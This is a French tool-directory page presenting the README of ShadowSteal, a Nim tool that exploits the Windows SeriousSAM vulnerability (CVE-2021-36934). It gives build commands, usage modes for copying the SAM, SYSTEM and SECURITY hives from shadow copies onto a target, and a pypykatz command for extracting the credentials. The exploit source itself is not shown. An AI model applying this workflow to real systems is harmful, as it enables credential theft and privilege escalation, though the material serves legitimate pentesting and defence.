Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
ShadowSteal — Implémentation pure Nim pour l'exploitation de CVE-2021-36934, l'escalade de privilèges locaux SeriousSAM | Kitploit
Outils/GitHubGitHub/huskyhacks/shadowsteal
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationPost-ExploitationTests d'IntrusionRed Teaming
GitHubhuskyhacks/shadowsteal

ShadowSteal

Implémentation pure Nim pour l'exploitation de CVE-2021-36934, l'escalade de privilèges locaux SeriousSAM

Voir le dépôt
210372il y a 4 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

ShadowSteal | CVE-2021-36934

Implémentation pure Nim pour exploiter CVE-2021-36934, la vulnérabilité SeriousSAM d'élévation de privilèges locaux (LPE). Pas sûr pour l'OPSEC... pour l'instant ;). Je ne revendique pas la découverte de cette exploitation.

Démarrage rapide

Construire avec Docker

Démarrer avec ShadowSteal est maintenant plus facile que jamais grâce à Docker ! Vous ne voulez pas vous embêter à installer les dépendances Nim ? Je vous comprends ! Lancez le script Python pour créer l'environnement de construction Docker, compiler le binaire, le transférer sur votre hôte, puis tuer le conteneur.

Installez Docker sur votre hôte (consultez la documentation pour savoir comment l'installer selon votre système d'exploitation), puis exécutez le script Python ShadowSteal dans le répertoire principal :

root@kitploit:~
$ git clone https://github.com/HuskyHacks/ShadowSteal.git && cd ShadowSteal
root@kitploit:~
$ sudo python3 ShadowSteal.py && cd bin/ && ls -l

Construire à partir des sources

Ou construisez à partir des sources en installant Nim et ses dépendances :

root@kitploit:~
$ sudo apt-get install nim
root@kitploit:~
$ nimble install zippy argparse winim

Installez la chaîne d'outils MinGW si elle n'est pas déjà installée.

root@kitploit:~
$ sudo apt-get install mingw-w64
root@kitploit:~
$ git clone https://github.com/HuskyHacks/ShadowSteal.git && cd ShadowSteal
root@kitploit:~
$ make && cd bin/ && ls -l

Transférez vers la cible...

root@kitploit:~
PS C:\Users\husky\Desktop> .\ShadowSteal.exe -h

Résumé

En raison d'un oubli de Microsoft, les utilisateurs normaux ont des droits de lecture sur le contenu du dossier ...\System32\config\ dans les versions récentes de Windows. Entre autres, cela signifie qu'un utilisateur de bas niveau a un accès en lecture aux fichiers SAM, System et Security dans ...\System32\config.

1.png

Oups. Que pouvons-nous faire avec ça ?

Certains chercheurs très observateurs (mention spéciale à @jonasLyk !) ont remarqué que si un hôte Windows utilise une configuration spécifique de restauration système, les "Volume Shadow Copies", alors l'hôte stocke des copies de sauvegarde de ces fichiers accessibles via l'espace de noms de périphérique Win32 pour ces copies.

2.png

3.png

Le SAM est normalement verrouillé pendant le fonctionnement de l'hôte, donc l'accès au SAM dans ...\System32\config\ est impossible. Mais ces copies de volume fantômes sont accessibles à tout utilisateur sur l'hôte à cause de cette mauvaise configuration. Très pratique !

ShadowSteal

ShadowSteal est un binaire écrit en Nim pour automatiser l'énumération et l'exfiltration des fichiers SAM, System et Security à partir de ces copies fantômes. Il parcourt les emplacements possibles des copies fantômes et, lorsqu'il trouve une cible, il extrait les fichiers dans un répertoire compressé (pensez à la sortie de Bloodhound).

4.png

Fonctionnalités :

  • Mode Triage et Bruteforce, pour une énumération approfondie ou rapide.
  • Extraction automatisée et regroupement des identifiants cibles.
  • Mode Jeff Beezy. (hein, quoi ?)
  • Environnement de construction Docker intégré pour une compilation facile !
  • Énumérera tous les emplacements HarddiskShadowCopy disponibles, sélectionnera dynamiquement le numéro le plus élevé, et les ciblera pour l'exploitation/l'extraction.

6.png

Ce n'est pas révolutionnaire et le code est un peu bricolé, mais ça fonctionne et c'était amusant à construire !

Installation à partir des sources

Installez Nim :

root@kitploit:~
$ sudo apt-get install nim

Installez les dépendances :

root@kitploit:~
$ nimble install zippy argparse winim

Installez la chaîne d'outils MinGW si elle n'est pas déjà installée :

root@kitploit:~
$ sudo apt-get install mingw-w64

Compilez pour Windows 64 bits :

root@kitploit:~
$ make

Transférez vers la cible et exécutez-le !

Utilisation

root@kitploit:~
PS C:\Users\husky\Desktop> .\ShadowSteal.exe -h
[*] ShadowSteal! Identifie et extrait les identifiants qui peuvent être volés via l'exploitation de SeriousSAM (CVE-2021-36934). Recherche du plus élevé au plus bas, par défaut recherche de 100 à 1.

Usage:
   [options]

Options:
  -h, --help
  -t, --triage               [*] Mode Triage. Énumération rapide, essaie de trouver des gains rapides.
  -bf, --bruteforce          [*] Mode Bruteforce. Énumère toute la plage des emplacements possibles (512 à 1). Prend un peu de temps.
  -b, --bezos                [?] Mode Jeff Bezos

Mode Triage

Limite la recherche brute d'emplacements à 10 à 1, en décrémentant à chaque tentative. Rapide et efficace dans la plupart des environnements.

root@kitploit:~
PS C:\Users\husky\Desktop> .\ShadowSteal.exe -t

Mode Bruteforce

Recherche tous les emplacements possibles (512), en décrémentant jusqu'à 1. Essayez ceci pour énumérer complètement l'environnement. Prend quelques minutes.

root@kitploit:~
PS C:\Users\husky\Desktop> .\ShadowSteal.exe -bf

Analyse des résultats

Transférez le répertoire de résultats sur votre hôte attaquant et extrayez les données avec Pypykatz. Pour l'installer :

root@kitploit:~
$ pip3 install pypykatz

Pour exécuter Pypykatz :

root@kitploit:~
$ pypykatz registry [yyyyMMddhhmm_SYSTEM] --sam [yyyyMMddhhmm_SAM] --security [yyyyMMddhhmm_SECURITY]

5.png

Historique des versions

v.04.01 | la mise à jour Docktastic

Inclut désormais un environnement de construction Docker prêt à l'emploi ! Exécutez simplement le script ShadowSteal.py pour configurer l'environnement Docker, compiler le binaire, le retransférer sur votre hôte et tuer les conteneurs de construction. Ça marche ! (Un assemblage est requis, c'est-à-dire que vous avez besoin de Docker pour l'exécuter).

v.03.69 | la mise à jour N I C E

Épuré et efficace. Options de compilation optimisées ajoutées. Énorme gain de performances grâce à l'optimisation du compilateur, le bruteforce complet se déroule désormais presque instantanément. Un grand merci à @orbitalgun pour la pseudo PR, que la gloire soit sur votre maison et votre nom !

v.02 LA MISE À JOUR JEFF BEEZY

  • Mode Bruteforce et Triage
  • Un meilleur algorithme de recherche
  • Nettoyage du code
  • Mode Jeff Beezy
  • Beaucoup de leçons apprises depuis la première version !

v.01 LA VERSION DE LANCEMENT

Accrochez-vous les gars, ce train est en marche. Cette version était mon prototype rapide et elle était assez nulle lol. Mais très amusante à construire ! Fonctionnalités :

  • Code "fonctionnel"

Références

  • Divulgation originale de cette CVE par @jonasLyk.
  • Page de référence CVE
  • Crédit des paroles : Bezos I par Bo Burnham. Tous droits réservés.

Avertissement

  • Usage légal et éthique uniquement.

7.png

Télécharger l’outil